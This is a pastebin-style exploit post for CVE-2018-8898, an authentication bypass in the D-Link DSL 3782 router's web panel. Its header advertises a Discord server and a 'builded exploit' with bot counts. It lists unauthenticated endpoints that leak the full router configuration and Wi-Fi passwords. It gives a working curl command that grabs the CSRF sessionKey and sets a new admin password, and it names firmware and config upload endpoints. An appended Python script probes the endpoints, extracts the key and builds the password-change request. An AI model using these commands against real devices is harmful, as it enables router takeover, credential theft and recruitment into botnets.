[D-Link DSL 3782 EXPLOIT]

xB4ckdoorREAL Nov 4th, 2018 (edited)
#DISCORD: https://discord.gg/PTW3yPp [BUILDED EXPLOIT][AVRG/S: IN 4 HOUR BY 10 SERVER ONLY 480 BOTS,FIXED SHIT.]
 
#AUTH BYPASS.
# Version: A1_WI_20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"
# Category: Webapps
# CVE : CVE-2018-8898
# Date: 20/05/2018
 
# Description
# The web panel of the D-Link DSL 3782, version A1_WI_20170303, does not issue a token (e.g. a session cookie) that identifies the logged-in administrator; it relies only on a server-side timeout that lasts a few minutes.
# In addition, the server-side mitigation in place prompts for login credentials every time the webroot is loaded, but leaves the application endpoints unprotected and therefore affected by this authentication bypass.
 
# Therefore, after a valid login by the administrator, the web panel does not distinguish HTTP requests from the admin from those that come from other users for as long as the timeout window is open.
# This way, an attacker can script an automatic routine that performs unwanted actions such as arbitrary modifications to router and SSID passwords and configurations.
 
# Some of the possible actions for retrieving important information:
# GET http://192.168.1.1/romfile.cfg ---> retrieve the complete settings of the router (all credentials included)
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp ---> retrieve the password for the 2.4 GHz SSID
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp ---> retrieve the password for the 5.0 GHz SSID
# GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp ---> retrieve the password for the Guest network, if present
 
# For POST requests that make changes to passwords, SSID names and configurations, a 'sessionKey' value is used by the web application to prevent Cross-Site Request Forgery (CSRF) attacks.
# However, this value can be retrieved through the same authentication bypass with the following GET request:
# 'GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp'
 
# For example, the POST request below changes the Web Interface Administrator's password (the inner curl fetches the sessionKey without any cookie and inserts the response body verbatim):
curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp
 
# Some other possible actions for altering the configuration:
# POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp ---> change the passwords of the SSIDs
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp ---> upgrade the firmware
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp ---> reboot the router
# POST /cgi-bin/New_GUI/Set/config_upgrade.asp ---> upload a new configuration file ('romfile.cfg')
 
# Note 1: Since the router lacks network segregation, a user with access to the Guest network could also perform this attack.
# Note 2: Web panels exposed to the Internet allow an anonymous attacker to leverage this vulnerability and possibly take over the router.
# Note 3: Other forks of the firmware and other software versions have not been tested.
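The check a defender (or tester) actually wants from the above is simple: does the device hand out data on these endpoints, and in particular a 'sessionKey', to a client that presents no session cookie at all? The script below is an added example, not part of the advisory or of D-Link's code. It probes the GET endpoints listed above without any cookie, extracts the sessionKey the same way the curl command does (it assumes get_sessionKey.asp returns the bare key as its response body, since the curl inserts that body verbatim), and builds the identical form body for the Admin.asp POST without sending it. The HTTP layer is injectable so the logic can be exercised offline against a constructed fake responder; the function and variable names are mine.

```python
#!/usr/bin/env python3
"""Added example for CVE-2018-8898 (DSL-3782 auth bypass), not from the advisory.

Probes the unauthenticated GET endpoints the advisory lists and reports
whether a sessionKey is obtainable with no cookie, which is the condition
that lets an attacker perform the CSRF-protected POSTs.

Assumptions (mine, not stated by the advisory):
  * the router listens on http://192.168.1.1 as in the advisory's examples;
  * get_sessionKey.asp returns the bare key as its response body (the
    advisory's curl uses that body verbatim as the sessionKey value).
"""
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Optional, Tuple

BASE = "http://192.168.1.1"

# GET endpoints the advisory says are readable during the admin's timeout window.
UNAUTH_GET_PATHS = [
    "/romfile.cfg",
    "/cgi-bin/get/New_GUI/Settings_24.asp",
    "/cgi-bin/get/New_GUI/Settings_5.asp",
    "/cgi-bin/New_GUI/GuestZone.asp",
    "/cgi-bin/get/New_GUI/get_sessionKey.asp",
]
SESSION_KEY_PATH = "/cgi-bin/get/New_GUI/get_sessionKey.asp"
ADMIN_SET_PATH = "/cgi-bin/New_GUI/Set/Admin.asp"

# A fetcher takes (method, url, body) and returns (status, body_text).
# Injectable so the logic can be tested against a fake responder.
Fetcher = Callable[[str, str, Optional[bytes]], Tuple[int, str]]


def urllib_fetch(method: str, url: str, body: Optional[bytes] = None,
                 timeout: float = 5.0) -> Tuple[int, str]:
    """Real transport: plain request, deliberately sending no cookies."""
    req = urllib.request.Request(url, data=body, method=method)
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def probe_unauth_paths(fetch: Fetcher, base: str = BASE) -> Dict[str, int]:
    """Map each listed path to the HTTP status it returns with no session cookie.
    A 200 here means the endpoint is being served to an unauthenticated client."""
    return {p: fetch("GET", base + p, None)[0] for p in UNAUTH_GET_PATHS}


def get_session_key(fetch: Fetcher, base: str = BASE) -> Optional[str]:
    """Fetch the CSRF sessionKey exactly as the advisory's inner curl does:
    GET with no cookie, treat the (whitespace-stripped) body as the key."""
    status, body = fetch("GET", base + SESSION_KEY_PATH, None)
    if status != 200:
        return None
    key = body.strip()
    return key or None


def build_admin_post(new_password: str, session_key: str) -> bytes:
    """Same form body the advisory's curl sends to Admin.asp."""
    return urllib.parse.urlencode(
        {"Password": new_password, "sessionKey": session_key}).encode()


def is_exposed(fetch: Fetcher, base: str = BASE) -> bool:
    """True when a sessionKey is handed out with no session cookie, i.e. the
    admin's timeout window is open to anyone who can reach the panel."""
    return get_session_key(fetch, base) is not None


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else BASE
    for path, status in probe_unauth_paths(urllib_fetch, target).items():
        print(f"{status} {path}")
    print("sessionKey obtainable without a cookie:", is_exposed(urllib_fetch, target))
```

Run it against the router's LAN address right after an administrator has logged out of the panel: on an unaffected device every path should come back with a non-200 status and the final line should be False; a True within the timeout window reproduces the condition the advisory describes without changing anything on the device. `build_admin_post` is included only to show that the curl's payload is nothing more than two form fields, which is why the leaked sessionKey is the whole CSRF defence.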